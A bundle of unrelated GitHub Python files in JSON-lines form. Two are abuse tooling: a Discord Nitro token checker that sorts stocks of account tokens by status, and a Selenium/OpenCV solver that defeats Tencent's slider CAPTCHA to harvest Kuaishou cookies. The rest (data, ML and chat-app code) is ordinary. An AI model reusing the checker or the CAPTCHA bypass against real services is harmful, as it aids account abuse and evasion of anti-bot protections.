removeToken(token, file)\n                three_m_invalid += 1\n    print()\n    print(\"Checking 1 Month Nitro Tokens\")\n    if checkEmpty(\"1m_tokens.txt\"):\n        print(red + \"No Stock To Check\" + white) \n    else:\n        for token in one_m_tokens: \n            file = \"1m_tokens.txt\"\n            s, headers = get_headers(token)\n            profile = validate_token(s, headers)\n            if profile != False:\n                boost_data = s.get(f\"https://discord.com/api/v9/users/@me/guilds/premium/subscription-slots\", headers={'Authorization': token})\n\n                if boost_data.status_code == 403:\n                    print(red + f\" ✗ {white}{token} - {profile}{red} [LOCKED]\" + white)\n                    removeToken(token, file)\n                    one_m_locked += 1\n                if len(boost_data.json()) != 0 and (boost_data.status_code == 200 or boost_data.status_code == 201):\n                    if boost_data.json()[0]['cooldown_ends_at'] != None:\n                        print(red + f\" ✗ {white}{token} - {profile}{red} [USED]\" + white)\n                        removeToken(token, file)\n                        one_m_used += 1\n                if len(boost_data.json()) == 0:\n                    removeToken(token, file)\n                    print(f\"{red} ✗ {white}{token} - {profile}{red} [NO NITRO]\" + white)\n                    one_m_nonitro += 1\n                else:\n                    if len(boost_data.json()) != 0 and (boost_data.status_code == 200 or boost_data.status_code == 201):\n                        if boost_data.json()[0]['cooldown_ends_at'] == None:\n\n                            print(f\"{green} ✓ {white}{token} - {profile}{green} [WORKING]\" + white)\n                            one_m_working += 1\n            else:\n                print(red + f\" ✗ {white}{token}{red} [INVALID]\" + white)\n                removeToken(token, file)\n                one_m_invalid += 1\n\n    print(f\"{green}WORKING (with nitro) : {white}{three_m_working} | {red}USED : {white}{three_m_used} | {red}NO NITRO : {white}{three_m_nonitro} | {red}LOCKED : {white}{three_m_locked} | {red}INVALID : {white}{three_m_invalid}\")\n    print(f\"{green}WORKING (with nitro) : {white}{one_m_working} | {red}USED : {white}{one_m_used} | {red}NO NITRO : {white}{one_m_nonitro} | {red}LOCKED : {white}{one_m_locked} | {red}INVALID : {white}{one_m_invalid}\")\n\ncls()\nnitrochecker()\n","repo_name":"lmaoonyx/nitro-token-checker-1","sub_path":"checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":8797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40882755701","text":"import os\nimport sqlite3\npath, _ = os.path.split(os.path.realpath(__file__))\nconn = sqlite3.connect(path+'/11/db.sqlite3')\nconneted_sqlite = conn.cursor()\n#raw = conneted_sqlite.execute('select game, aview from music')\nraw = conneted_sqlite.execute('select game, id, year, month from music where aview!=\"none\"')\ngame_name = {}\n\n\nraw = list(raw)\nprint(len(raw))\ntemp = {}\nfor i in range(0,len(raw)):\n\tif len(str(raw[i][3]))==1:\n\t\tmonth = '-0'+str(raw[i][3])\n\telse:\n\t\tmonth = '-'+str(raw[i][3])\n\ttime = str(raw[i][2])+str(month)\n\tif raw[i][0] in temp:\n\t\tif time in temp[raw[i][0]]:\n\t\t\ttemp[raw[i][0]][time] = str(temp[raw[i][0]][time]) + ','+str(raw[i][1])\n\t\telse:\n\t\t\ttemp[raw[i][0]][time] = str(raw[i][1])\n\telse:\n\t\ttemp[raw[i][0]]={}\n\t\tif time in temp[raw[i][0]]:\n\t\t\ttemp[raw[i][0]][time] = str(temp[raw[i][0]][time]) + ','+str(raw[i][1])\n\t\telse:\n\t\t\ttemp[raw[i][0]][time] = str(raw[i][1])\n#print(temp)\ntotal=0\nfor key, value in temp.items():\n\tfor month, ids in value.items():\n\t\tids = ids.split(',')\n\t\tlength = len(ids)\n\t\ttotal = total + length\n\t\tprint(\"game\",key,\"month\",month,\"comment\",(length),'id',ids)\n#assert total == len(raw)","repo_name":"AlexTsai1618/project_NLP","sub_path":"Music_NEW/monthcom.py","file_name":"monthcom.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
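# Aside: the nested game -> month -> ids accumulation in monthcom.py above is
# a natural fit for collections.defaultdict; a minimal sketch, with made-up
# rows standing in for the (game, id, year, month) tuples read from SQLite.
from collections import defaultdict

rows = [("GameA", 1, 2019, 3), ("GameA", 2, 2019, 3), ("GameB", 7, 2020, 11)]
by_game_month = defaultdict(lambda: defaultdict(list))
for game, id_, year, month in rows:
    # zero-pad the month so "2019-03" sorts and groups correctly
    by_game_month[game][f"{year}-{month:02d}"].append(id_)
for game, months in by_game_month.items():
    for month, ids in months.items():
        print("game", game, "month", month, "comment", len(ids), "id", ids)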
+{"seq_id":"73888237284","text":"# -*- coding:utf-8 -*-\n# @Time : 2019/11/20 13:52\n# @Author : litao\nimport numpy as np\nimport random\n\nimport json,redis,re,requests\nfrom selenium.webdriver import ActionChains\nimport time,datetime\nfrom selenium import webdriver\nfrom PIL import Image\nimport os\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport cv2\nfrom fontTools.ttLib import *\n\n\nclass Login(object):\n    \"\"\"\n    Cracks the Tencent Waterproof Wall sliding captcha\n    Uses the OpenCV library\n    Success rate is roughly 90%: in real use, after logging in you can check whether the current page shows information that only appears on a successful login (e.g. the username), and loop otherwise\n    https://open.captcha.qq.com/online.html\n    Cracks the Tencent sliding captcha\n    Tencent Waterproof Wall\n    python + selenium + cv2\n    \"\"\"\n\n    rds = redis.StrictRedis(host='192.168.17.60', port=6379, db=2, decode_responses=True)\n    # chrome_options = webdriver.ChromeOptions()\n    # chrome_options.add_argument('--headless')\n    # chrome_options.add_argument('--disable-gpu')\n    # # self.chrome_options.add_argument(\"--start-maximized\")\n    # chrome_options.add_argument(\"--no-sandbox\")\n    # chrome_options.add_experimental_option('excludeSwitches', ['enable-automation'])\n    # timestamp = str(datetime.datetime.now().timestamp() * 1e3)\n    # first_page_headers = {\n    #     \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\",\n    #     \"Accept-Encoding\": \"gzip, deflate, br\",\n    #     \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n    #     \"Cache-Control\": \"max-age=0\",\n    #     \"Connection\": \"keep-alive\",\n    #     \"Host\": \"live.kuaishou.com\",\n    #     \"Upgrade-Insecure-Requests\": \"1\",\n    #     \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\",\n    # }\n\n    def __init__(self):\n        # In real use, the account and password can be filled in here\n        # self.url = \"https://open.captcha.qq.com/online.html\"\n        self.chrome_options = webdriver.ChromeOptions()\n        self.chrome_options.add_argument('--headless')\n        self.chrome_options.add_argument('--disable-gpu')\n        # self.chrome_options.add_argument(\"--start-maximized\")\n        self.chrome_options.add_argument(\"--no-sandbox\")\n        self.chrome_options.add_experimental_option('excludeSwitches', ['enable-automation'])\n        self.timestamp = str(datetime.datetime.now().timestamp()*1e3)\n        self.first_page_headers = {\n            \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\",\n            \"Accept-Encoding\": \"gzip, deflate, br\",\n            \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n            \"Cache-Control\": \"max-age=0\",\n            \"Connection\": \"keep-alive\",\n            \"Host\": \"live.kuaishou.com\",\n            \"Upgrade-Insecure-Requests\": \"1\",\n            \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\",\n        }\n        # self.rds = redis.StrictRedis(host='192.168.17.60', port=6379, db=2, decode_responses=True)\n\n\n    @staticmethod\n    def show(name):\n        cv2.imshow('Show', name)\n        cv2.waitKey(0)\n        cv2.destroyAllWindows()\n\n    @staticmethod\n    def webdriverwait_send_keys(dri, element, value):\n        \"\"\"\n        Explicit wait, then send keys\n        :param dri: driver\n        :param element:\n        :param value:\n        :return:\n        \"\"\"\n        WebDriverWait(dri, 10, 5).until(lambda dr: element).send_keys(value)\n\n    @staticmethod\n    def webdriverwait_click(dri, element):\n        \"\"\"\n        Explicit wait, then click\n        :param dri: driver\n        :param element:\n        :return:\n        \"\"\"\n        WebDriverWait(dri, 10, 5).until(lambda dr: element).click()\n\n\n    def get_postion(self,chunk, canves):\n        \"\"\"\n        Locate the gap position\n        :param chunk: the gap image (the original image)\n        :param canves:\n        :return: position x, y\n        \"\"\"\n        otemp = chunk\n        oblk = canves\n        target = cv2.imread(otemp, 0)\n        template = cv2.imread(oblk, 0)\n        # w, h = target.shape[::-1]\n        temp = './image/temp_%s.jpg' % self.timestamp\n        targ = './image/targ_%s.jpg' % self.timestamp\n        cv2.imwrite(temp, template)\n        cv2.imwrite(targ, target)\n        target = cv2.imread(targ)\n        target = cv2.cvtColor(target, cv2.COLOR_BGR2GRAY)\n        target = abs(255 - target)\n        cv2.imwrite(targ, target)\n        target = cv2.imread(targ)\n        template = cv2.imread(temp)\n        result = cv2.matchTemplate(target, template, cv2.TM_CCOEFF_NORMED)\n        x, y = np.unravel_index(result.argmax(), result.shape)\n        return x, y\n        # # show the matched region drawn on the image\n        # cv2.rectangle(template, (y, x), (y + w, x + h), (7, 249, 151), 2)\n        # cv2.imwrite(\"yuantu.jpg\", template)\n        # show(template)\n
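# Aside: a self-contained sketch of the template-matching idea get_postion()
# relies on, using synthetic arrays instead of the downloaded captcha images.
import cv2
import numpy as np

rng = np.random.default_rng(0)
scene = rng.random((80, 200), dtype=np.float32)   # the "big image"
patch = scene[30:50, 120:140].copy()              # 20x20 "gap" cut from it
res = cv2.matchTemplate(scene, patch, cv2.TM_CCOEFF_NORMED)
# note: unravel_index yields (row, column); the record's code calls these
# x, y but later reads position[1] as the horizontal offset, i.e. the column
row, col = np.unravel_index(res.argmax(), res.shape)
print(row, col)  # -> 30 120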
\n    @staticmethod\n    def get_track(distance):\n        \"\"\"\n        Simulate a drag track, pretending a human is operating the slider\n        :param distance:\n        :return:\n        \"\"\"\n        # initial velocity\n        v = 0\n        # the track is sampled in 0.2s time units; each track entry is the displacement over 0.2s\n        t = 0.2\n        # displacement/track list; one element represents the displacement over 0.2s\n        tracks = []\n        # current displacement\n        current = 0\n        # start decelerating once the mid value is reached\n        mid = distance * 7 / 8\n\n        distance += 10  # slide a little past the target first, then slide back at the end\n        # a = random.randint(1,3)\n        while current < distance:\n            if current < mid:\n                # the smaller the acceleration, the smaller each step's displacement, so the simulated track has more, finer points\n                a = random.randint(2, 4)  # accelerating\n            else:\n                a = -random.randint(3, 5)  # decelerating\n\n            # initial velocity for this step\n            v0 = v\n            # displacement within the 0.2s interval\n            s = v0 * t + 0.5 * a * (t ** 2)\n            # current position\n            current += s\n            # append to the track list\n            tracks.append(round(s))\n\n            # the velocity has reached v; it becomes the next step's initial velocity\n            v = v0 + a * t\n\n        # slide back to roughly the exact position\n        for i in range(4):\n            tracks.append(-random.randint(2, 3))\n        for i in range(4):\n            tracks.append(-random.randint(1, 3))\n        return tracks\n
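# Aside: a condensed, self-contained version of the accelerate/overshoot/creep-
# back track idea above, for experimenting outside Selenium. The constants are
# arbitrary; a small guard is added so short distances cannot stall the loop.
import random

def human_track(distance, overshoot=10, dt=0.2):
    v, pos, steps = 0.0, 0.0, []
    target = distance + overshoot
    while pos < target:
        # accelerate until 7/8 of the distance, then decelerate
        a = random.randint(2, 4) if pos < distance * 7 / 8 else -random.randint(3, 5)
        step = v * dt + 0.5 * a * dt ** 2
        if step <= 0:
            step = 1.0  # guard: never stall or move backwards mid-drag
        pos += step
        steps.append(round(step))
        v = max(v + a * dt, 0.0)
    steps += [-random.randint(1, 3) for _ in range(8)]  # creep back over the target
    return steps

print(sum(human_track(150)))  # lands near 150; rounding makes it approximate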
\n\n    @staticmethod\n    def urllib_download(imgurl, imgsavepath):\n        \"\"\"\n        Download an image\n        :param imgurl: the image url\n        :param imgsavepath: the path to save it to\n        :return:\n        \"\"\"\n        from urllib.request import urlretrieve\n        urlretrieve(imgurl, imgsavepath)\n\n    def after_quit(self):\n        \"\"\"\n        Close the browser\n        :return:\n        \"\"\"\n        self.driver.quit()\n\n    def get_num_dic(self):\n        xml_re = {\n            '': 0,\n            '': 0,\n            '': 1,\n            '': 1,\n            '': 2,\n            '': 2,\n            '': 3,\n            '': 3,\n            '': 4,\n            '': 4,\n            '': 5,\n            '': 5,\n            '': 6,\n            '': 6,\n            '': 7,\n            '': 7,\n            '': 8,\n            '': 8,\n            '': 9,\n            '': 9\n        }\n        uni_code_dic = {}\n        try:\n            for re_code in xml_re:\n                code_dic = re.findall(re_code, self.xml_text)\n                if code_dic:\n                    uni_code_dic[code_dic[0].replace(\"uni\", \"\\\\\\\\u\").lower()] = xml_re[re_code]\n            # print(\"uni_code_dic\", uni_code_dic)\n            return uni_code_dic\n        except:\n            print(\"can't find \",self.xml_text)\n            return False\n\n    def unicode_to_num(self, uni_str):\n        count_num = str(uni_str.encode(\"unicode_escape\"))[2:-1]\n        # print(count_num)\n        for i in self.uni_code_dic:\n            if i in count_num:\n                count_num = count_num.replace(i, str(self.uni_code_dic[i]))\n        # print(count_num)\n        return count_num\n\n    def login_main(self,url):\n\n        driver = self.driver\n        driver.maximize_window()\n        # driver.get(self.url)\n\n        # click_keyi_username = driver.find_element_by_xpath(\"//div[@class='wp-onb-tit']/a[text()='可疑用户']\")\n        # self.webdriverwait_click(driver, click_keyi_username)\n\n        self.driver.get(url)\n        self.driver.implicitly_wait(5)\n        res = self.driver.find_element_by_xpath(\"/html/body/iframe\")\n        # print(res.get_attribute(\"src\"))\n        # print(self.driver.page_source)\n        #self.driver.get(res.get_attribute(\"src\"))\n\n        # login_button = driver.find_element_by_id('slide_bar_head')\n        # self.webdriverwait_click(driver, login_button)\n        # time.sleep(1)\n\n        driver.switch_to.frame(driver.find_element_by_xpath('/html/body/iframe'))  # switch to the slider frame\n        time.sleep(0.5)\n        try:\n            bk_block = driver.find_element_by_xpath('//*[@id=\"slideBkg\"]')  # full background image\n        except:\n            bk_block = driver.find_element_by_xpath('//*[@id=\"container_body\"]/div/div[1]/div/div[2]/img')\n        web_image_width = bk_block.size\n        web_image_width = web_image_width['width']\n        bk_block_x = bk_block.location['x']\n\n        try:\n            slide_block = driver.find_element_by_xpath('//*[@id=\"slideBlock\"]')  # small slider piece\n        except:\n            slide_block = driver.find_element_by_xpath('//*[@id=\"slideBlock\"]')  # small slider piece\n        slide_block_x = slide_block.location['x']\n        bk_block = bk_block.get_attribute('src')  # url of the background image\n\n        slide_block = slide_block.get_attribute('src')  # url of the small slider image\n        slid_ing = driver.find_element_by_xpath('//div[@id=\"slide_bar_head\"]')  # the slider handle\n\n        os.makedirs('./image/', exist_ok=True)\n        self.urllib_download(bk_block, './image/bkBlock_%s.png' % self.timestamp)\n        self.urllib_download(slide_block, './image/slideBlock_%s.png' % self.timestamp)\n        time.sleep(0.5)\n        img_bkblock = Image.open('./image/bkBlock_%s.png' % self.timestamp)\n        real_width = img_bkblock.size[0]\n        width_scale = float(real_width) / float(web_image_width)\n        position = self.get_postion('./image/bkBlock_%s.png' % self.timestamp, './image/slideBlock_%s.png' % self.timestamp)\n        real_position = position[1] / width_scale\n        real_position = real_position - (slide_block_x - bk_block_x)\n        track_list = self.get_track(real_position + 5)\n\n        ActionChains(driver).click_and_hold(on_element=slid_ing).perform()  # press the left mouse button and hold\n        time.sleep(0.1)\n        # print('step 2: drag the element')\n        for track in track_list:\n            ActionChains(driver).move_by_offset(xoffset=track, yoffset=random.randrange(-2,2)).perform()  # move the mouse by (x, y) relative to the current position\n            # time.sleep(0.001)\n        # ActionChains(driver).move_by_offset(xoffset=-random.randint(0, 1), yoffset=0).perform()  # fine-tune here if needed, based on the actual situation\n        time.sleep(1)\n        # print('step 3: release the mouse')\n        ActionChains(driver).release(on_element=slid_ing).perform()\n        print('login succeeded')\n        time.sleep(2)\n        self.driver.get(url)\n        self.driver.implicitly_wait(5)\n\n    # @classmethod\n    def get_cookies_and_front(self, url):\n        retry_times = 0\n        cookie_dic = {}\n        rds_len = self.rds.llen(\"kwai_cookies\")\n        if rds_len <= 10:\n            self.driver = webdriver.Chrome(options=self.chrome_options)\n            while retry_times < 5:\n                try:\n                    self.login_main(url)\n                    res = self.driver.find_element_by_xpath('//*[@id=\"slideBlock\"]')\n                    retry_times += 1\n                    print(\"retry_times \",retry_times)\n                except Exception as e:\n                    print(e)\n                    cookie = self.driver.get_cookies()\n                    for k in cookie:\n                        cookie_dic[k[\"name\"]] = k[\"value\"]\n                    self.rds.lpush(\"kwai_cookies\", json.dumps(cookie_dic))\n                    # print(\"cookies:\",cookie_dic)\n                    self.after_quit()\n                    break\n        else:\n            cookie_dic = json.loads(self.rds.lindex(\"kwai_cookies\",random.randint(0,rds_len-1)))\n\n        os_path = \"/home/hanye/\"\n        page_html = requests.get(url,headers=self.first_page_headers,cookies=cookie_dic)\n        # print(page_html.text)\n        this_path = os.path.isdir(os_path)\n        if not this_path:\n            os_path = \".\"\n        # font_face = self.driver.find_element_by_xpath(\"/html/head/style[1]\")\n        font_woff_link = re.findall(\"url\\('(.*?)'\\)\\s+format\\('woff'\\)\", page_html.text)\n        if not font_woff_link:\n            self.delete_cookies(cookie_dic)\n            self.get_cookies_and_front(url)\n        woff_name = font_woff_link[0].split(\"/\")[-1]\n        # print(woff_name)\n        try:\n            f = open(\"%s/%s.xml\" % (os_path, woff_name), encoding=\"utf-8\")\n        except:\n            woff = requests.get(font_woff_link[0],\n                                headers={\n                                    \"Referer\": url,\n                                    \"Sec-Fetch-Mode\": \"cors\",\n                                    \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36\"}).content\n            with open(\"%s/%s\" % (os_path, woff_name), \"wb\") as f:\n                f.write(woff)\n            font = TTFont(\"%s/%s\" % (os_path, woff_name))\n            font.saveXML(\"%s/%s.xml\" % (os_path, woff_name))\n            f = open(\"%s/%s.xml\" % (os_path, woff_name), encoding=\"utf-8\")\n\n        # f = open(\"./%s.xml\" % woff_name, encoding=\"utf-8\")\n        self.xml_text = f.read()\n        self.uni_code_dic = self.get_num_dic()\n        self.del_file()\n        return cookie_dic,self.uni_code_dic\n\n    def delete_cookies(self,cookie_dic):\n        # print(type(json.dumps(cookie_dic)))\n        res = 
self.rds.lrem(\"kwai_cookies\",1,json.dumps(cookie_dic))\n\n def del_file(self):\n file_path = [\"./image/bkBlock_%s.png\" % self.timestamp,\"./image/slideBlock_%s.png\" % self.timestamp,\"./image/temp_%s.jpg\" % self.timestamp,\"./image/targ_%s.jpg\" % self.timestamp]\n for single_path in file_path:\n try:\n os.remove(single_path)\n except:\n continue\n\n# login = Login()\n\n# if __name__ == '__main__':\n# login = Login()\n# cookie_dic,uni_code_dic = login.get_cookies_and_front(\"https://live.kuaishou.com/profile/3xw8s48b2q7htx9?csr=true\")\n","repo_name":"litaolemo/crawler","sub_path":"crawler_sys/utils/func_verification_code.py","file_name":"func_verification_code.py","file_ext":"py","file_size_in_byte":15953,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"38776485791","text":"import fault\n\nfrom magma_examples.shift_register import ShiftRegister\n\n\ndef test_shift_register():\n tester = fault.SynchronousTester(ShiftRegister, clock=ShiftRegister.CLK)\n seq = [0, 1, 1, 0, 1, 0, 0, 1]\n delay = [0, 0, 0]\n in_seq, out_seq = seq + delay, delay + seq\n for i, o in zip(in_seq, out_seq):\n tester.circuit.I = i\n tester.advance_cycle()\n tester.circuit.O.expect(o)\n tester.compile_and_run(\"verilator\", magma_output=\"mlir-verilog\")\n","repo_name":"leonardt/magma_examples","sub_path":"tests/test_shift_register.py","file_name":"test_shift_register.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10296097424","text":"COMPONENT_NAME_LENGTH = 100\n\n# Project name and slug length\nPROJECT_NAME_LENGTH = 60\n\n# Repository length\nREPO_LENGTH = 300\nBRANCH_LENGTH = 200\n\n# Maximal length of filename or mask\nFILENAME_LENGTH = 400\n\n# User model length\n# Note: This is currently limited by 192 to allow index on MySQL\nFULLNAME_LENGTH = 150\nUSERNAME_LENGTH = 150\nEMAIL_LENGTH = 190\n\n# Language\nLANGUAGE_CODE_LENGTH = 50\nLANGUAGE_NAME_LENGTH = 100\n\n# Variant\nVARIANT_REGEX_LENGTH = 190\n# Needed for unique index on MySQL\nVARIANT_KEY_LENGTH = 576\n\n# Maximal categories depth\nCATEGORY_DEPTH = 3\n","repo_name":"WeblateOrg/weblate","sub_path":"weblate/trans/defines.py","file_name":"defines.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":3905,"dataset":"github-code","pt":"52"} +{"seq_id":"29207055665","text":"from tqdm.notebook import tqdm\nimport torch\n\n\ndef train(model: torch.nn.Module,\n device: str,\n train_loader: torch.utils.data.DataLoader,\n optimizer: torch.optim.Optimizer,\n criterion: torch.nn.Module,\n epoch: int) -> tuple:\n \"\"\"Train the model for one epoch\n\n Args:\n model (Model): The model to train\n device (string): The device to use (cpu or cuda)\n train_loader (Dataloader): The training data loader\n optimizer (Optimizer): The optimizer to use\n criterion (Loss): The loss function to use\n epoch (int): The current epoch\n\n Returns:\n float, float : The training loss, the training accuracy\n \"\"\"\n # Initialize the training loss\n train_loss = 0.\n \n # Initialize the number of correct ranking predictions in order to compute\n # the accuracy\n train_correct = 0\n \n # Configure the model for training\n # (good practice, only necessary if the model operates differently for\n # training and validation)\n model.train()\n \n # Add a progress bar\n train_loader_pbar = tqdm(train_loader, unit=\"batch\")\n \n # Loop over the training batches\n for 
features1, features2, _, _ in train_loader_pbar:\n        \n        # Print the epoch and training mode\n        train_loader_pbar.set_description(f\"Epoch {epoch} [train]\")\n        \n        # Move features to GPU (if available)\n        features1 = features1.to(device)\n        features2 = features2.to(device)\n        \n        # Zero out gradients before each backpropagation pass, to avoid that\n        # they accumulate\n        optimizer.zero_grad()\n        \n        # Perform forward pass\n        predicted_costs1 = model(features1)\n        predicted_costs2 = model(features2)\n        \n        # Compute loss \n        loss = criterion(predicted_costs1,\n                         predicted_costs2)\n        \n        # Print the batch loss next to the progress bar\n        train_loader_pbar.set_postfix(batch_loss=loss.item())\n        \n        # Perform backpropagation (update weights)\n        loss.backward()\n        \n        # Adjust parameters based on gradients\n        optimizer.step()\n        \n        # Accumulate batch loss to average over the epoch\n        train_loss += loss.item()\n        \n        # Get the number of correct predictions\n        train_correct += torch.sum(\n            predicted_costs1 < predicted_costs2).item()\n    \n    # Compute the loss average over the epoch\n    train_loss /= len(train_loader)\n    \n    # Compute the accuracy\n    train_accuracy = 100*train_correct/len(train_loader.dataset)\n    \n    return train_loss, train_accuracy\n","repo_name":"TomRavaud/Internship-U2IS","sub_path":"src/traversal_cost/siamese_network/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41522427027","text":"# # -*- coding: utf-8 -*-\n\nfrom pineboolib.plugins.dgi.dgi_schema import dgi_schema\n\n\nclass dgi_qt(dgi_schema):\n\n    def __init__(self):\n        super(dgi_qt, self).__init__()  # desktopEnabled and mlDefault to True\n        self._name = \"qt\"\n        self._alias = \"Qt5\"\n","repo_name":"Miguel-J/pineboo-buscar","sub_path":"pineboolib/plugins/dgi/dgi_qt.py","file_name":"dgi_qt.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7581984270","text":"\nfrom typing import List, Tuple\nfrom langchain.docstore.document import Document\nfrom langchain.document_loaders import CSVLoader\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom pathlib import Path\nfrom langchain.vectorstores import Chroma\nfrom langchain.chains import RetrievalQA\nfrom langchain.chains.question_answering import load_qa_chain\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.callbacks import get_openai_callback\n\n\nimport shutil\nimport streamlit as st\nfrom dotenv import load_dotenv\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Comment\nimport requests\n\nimport logging\nimport os\n\nload_dotenv()\n\nlogging.basicConfig()\n\nclass Config():\n    chunk_size = 5000\n    chroma_persist_directory = 'chroma_store'\n    embeddings = OpenAIEmbeddings()\n    model = 'gpt-3.5-turbo-16k'\n    # model = 'gpt-4'\n    llm = ChatOpenAI(model=model, temperature=0)\n    history_file = Path('chat_history.txt')\n\ncfg = Config()\n\nlogger = logging.getLogger(\"csv-chat\")\n\nlogging.root.setLevel(logging.INFO)\n\n\ndef load_csv(file_path: Path) -> List[Document]:\n    \"\"\"\n    Use the csv loader to load the CSV content as a list of strings.\n    :param file_path: A CSV file path\n    :return: the document list after extracting and splitting all CSV records.\n    \"\"\"\n    loader = CSVLoader(file_path=str(file_path), encoding=\"utf-8\")\n    doc_list: List[Document] = loader.load()\n    doc_list = [d for d in 
doc_list if d.page_content != 'Question: \\nAnswer: ']\n logger.info(f\"First item: {doc_list[0].page_content}\")\n logger.info(f\"Length of CSV list: {len(doc_list)}\")\n return split_docs(doc_list)\n\n\ndef split_docs(doc_list: List[Document]) -> List[Document]:\n \"\"\"\n Splits the documents in smaller chunks from a list of documents.\n :param doc_list: A list of documents.\n \"\"\"\n text_splitter = CharacterTextSplitter(chunk_size=cfg.chunk_size, chunk_overlap=0, separator=\"\\n\\n\")\n texts = text_splitter.split_documents(doc_list)\n return texts\n\n\ndef extract_embeddings(texts: List[Document], doc_path: Path) -> Chroma:\n \"\"\"\n Either saves the Chroma embeddings locally or reads them from disk, in case they exist.\n :return a Chroma wrapper around the embeddings.\n \"\"\"\n embedding_dir = f\"{cfg.chroma_persist_directory}/{doc_path.stem}\"\n # if Path(embedding_dir).exists():\n # return Chroma(persist_directory=embedding_dir, embedding_function=cfg.embeddings)\n if Path(embedding_dir).exists():\n shutil.rmtree(embedding_dir, ignore_errors=True)\n try:\n docsearch = Chroma.from_documents(texts, cfg.embeddings, persist_directory=embedding_dir)\n docsearch.persist()\n except Exception as e:\n logger.error(f\"Failed to process {doc_path}: {str(e)}\")\n return None\n return docsearch\n\n\ndef process_question(similar_docs: List[Document], user_question: str) -> str:\n \"\"\"\n Sends the question to the LLM.\n :param similar_docs: A list of documents with the documents retrieved from the vector database.\n :param user_question: A user question\n :return: The result computed by the LLM.\n \"\"\"\n chain = load_qa_chain(cfg.llm, chain_type='stuff')\n similar_texts = [d.page_content for d in similar_docs]\n with get_openai_callback() as callback:\n response = chain.run(input_documents=similar_docs, question=user_question)\n logger.info(callback)\n return response, similar_texts\n\n\ndef write_history(question):\n \"\"\"\n Writes the question into a local history file.\n :param question: The text to be written to the local history file.\n \"\"\"\n if len(question) > 0:\n with open(cfg.history_file, \"a\") as f:\n f.write(f\"{question}\\n\")\n\n\n@st.cache_data()\ndef read_history()-> List[str]:\n \"\"\"\n Reads and caches some historical questions. 
Which you can use to ask questions in the UI.\n :return: a list of questions.\n \"\"\"\n with open(cfg.history_file, \"r\") as f:\n return list(set([l for l in f.readlines() if len(l.strip()) > 0]))\n \n\ndef process_user_question(docsearch: Chroma, user_question: str):\n \"\"\"\n Receives a user question and searches for similar text documents in the vector database.\n Using the similar texts and the user question retrieves the response from the LLM.\n :param docsearch: The reference to the vector database object\n :param user_question: The question the user has typed.\n \"\"\"\n if user_question:\n similar_docs: List[Document] = docsearch.similarity_search(user_question, k = 5)\n response, similar_texts = process_question(similar_docs, user_question)\n st.markdown(response)\n if len(similar_texts) > 0:\n write_history(user_question)\n st.text(\"Similar entries (Vector database results)\")\n st.write(similar_texts)\n else:\n st.warning(\"This answer is unrelated to our context.\")\n \n\ndef init_streamlit(docsearch: Chroma, texts):\n \"\"\"\n Creates the streamlit user interface.\n Use streamlit like this:\n streamlit run ./chat_main.py\n \"\"\"\n title = \"Ask questions about Onepoint\"\n st.set_page_config(page_title=title)\n st.header(title)\n st.write(f\"Context with {len(texts)} entries\")\n simple_chat_tab, historical_tab = st.tabs([\"Simple Chat\", \"Historical Questions\"])\n with simple_chat_tab:\n user_question = st.text_input(\"Your question\")\n with st.spinner('Please wait ...'):\n process_user_question(docsearch=docsearch, user_question=user_question)\n with historical_tab:\n user_question_2 = st.selectbox(\"Ask a previous question\", read_history())\n with st.spinner('Please wait ...'):\n logger.info(f\"question: {user_question_2}\")\n process_user_question(docsearch=docsearch, user_question=user_question_2)\n\n\ndef load_texts(doc_location: str) -> Tuple[List[str], Path]:\n \"\"\"\n Loads the texts of the CSV file and concatenates all texts in a single list.\n :param doc_location: The document location.\n :return: a tuple with a list of strings and a path.\n \"\"\"\n doc_path = Path(doc_location)\n texts = []\n for p in doc_path.glob(\"*.csv\"):\n texts.extend(load_csv(p))\n logger.info(f\"Length of texts: {len(texts)}\")\n return texts, doc_path\n\n\ndef text_from_html(body):\n \"\"\"\n Used to extract the text in a HTML file.\n Please check: https://stackoverflow.com/a/1983219/2735286\n :param body: the content of the HTML file.\n \"\"\"\n def tag_visible(element):\n if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]']:\n return False\n if isinstance(element, Comment):\n return False\n return True\n\n soup = BeautifulSoup(body, 'html.parser')\n texts = soup.findAll(text=True)\n visible_texts = filter(tag_visible, texts) \n return u\" \".join(t.strip() for t in visible_texts).strip()\n\n\n\ndef load_website_texts(url_list: List[str]) -> List[Document]:\n \"\"\"\n Used to load website texts.\n :param url_list: The list with URLs\n :return: a list of documents\n \"\"\"\n documents: List[Document] = []\n for url in url_list:\n text = text_from_html(requests.get(url).text)\n text_splitter = 